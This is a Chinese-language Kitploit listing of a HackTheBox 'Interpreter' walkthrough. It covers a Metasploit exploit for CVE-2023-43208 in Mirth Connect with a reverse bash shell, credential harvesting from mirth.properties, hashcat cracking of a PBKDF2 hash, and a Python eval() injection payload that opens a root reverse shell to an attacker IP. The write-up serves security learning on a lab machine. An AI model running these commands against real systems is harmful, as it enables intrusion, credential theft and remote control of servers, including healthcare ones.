Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Interpreter-HackTheBox — HackTheBox Interpreter 演练:CVE-2023-43208 Mirth Connect 反序列化 RCE、PBKDF2 哈希破解,以及 eval() 注入提权至 root。 | Kitploit
工具/GitHubGitHub/ledksv/interpreter-hackthebox
密码破解权限提升侦察漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用CTF渗透测试学习与教育
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

HackTheBox Interpreter 演练:CVE-2023-43208 Mirth Connect 反序列化 RCE、PBKDF2 哈希破解,以及 eval() 注入提权至 root。

查看仓库

Interpreter — HackTheBox

平台: HackTheBox 操作系统: Linux 状态:已退役 — 完整演练已发布。

完整演练: l3dsec.com/walkthroughs/interpreter-htb


攻击链

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 未认证 Java 反序列化 RCE
    → 以 mirth 身份获取 Shell
      → mirth.properties → MySQL 凭据
        → MySQL → sedric PBKDF2 哈希 → hashcat → SSH → 用户 FLAG
          → notif.py 以 root 身份运行在 127.0.0.1:54321
            → 通过 XML POST 进行 eval() 注入 → ROOT SHELL → ROOT FLAG

1. 枚举

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

通过 Mirth 的 REST API 进行版本指纹识别:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. 初始立足点 — CVE-2023-43208

Mirth Connect 4.4.0 存在未认证 RCE 漏洞,通过 Java 反序列化实现:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

以 mirth 身份获取 Shell。


3. 凭据收集

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

MySQL 枚举发现用户 sedric 及其 PBKDF2 哈希,以及一个将 XML 转发至 http://127.0.0.1:54321/addPatient 的 HL7 通道。


4. 用户 FLAG — 哈希破解

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

哈希已破解。以 sedric 身份 SSH 登录,读取 /home/sedric/user.txt。


5. 权限提升 — eval() 注入

notif.py 以 root 身份运行,并监听 127.0.0.1:54321/addPatient — 即 Mirth 转发 XML 的同一端点。它将 firstname XML 字段直接传递给 Python 的 eval()。

从 mirth Shell 发送的 Payload:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

监听器收到 Root Shell。


Flags

FlagValue
Userredacted
Rootredacted

仅供教育目的使用。仅测试您拥有或已获得明确书面许可进行测试的系统。

下载工具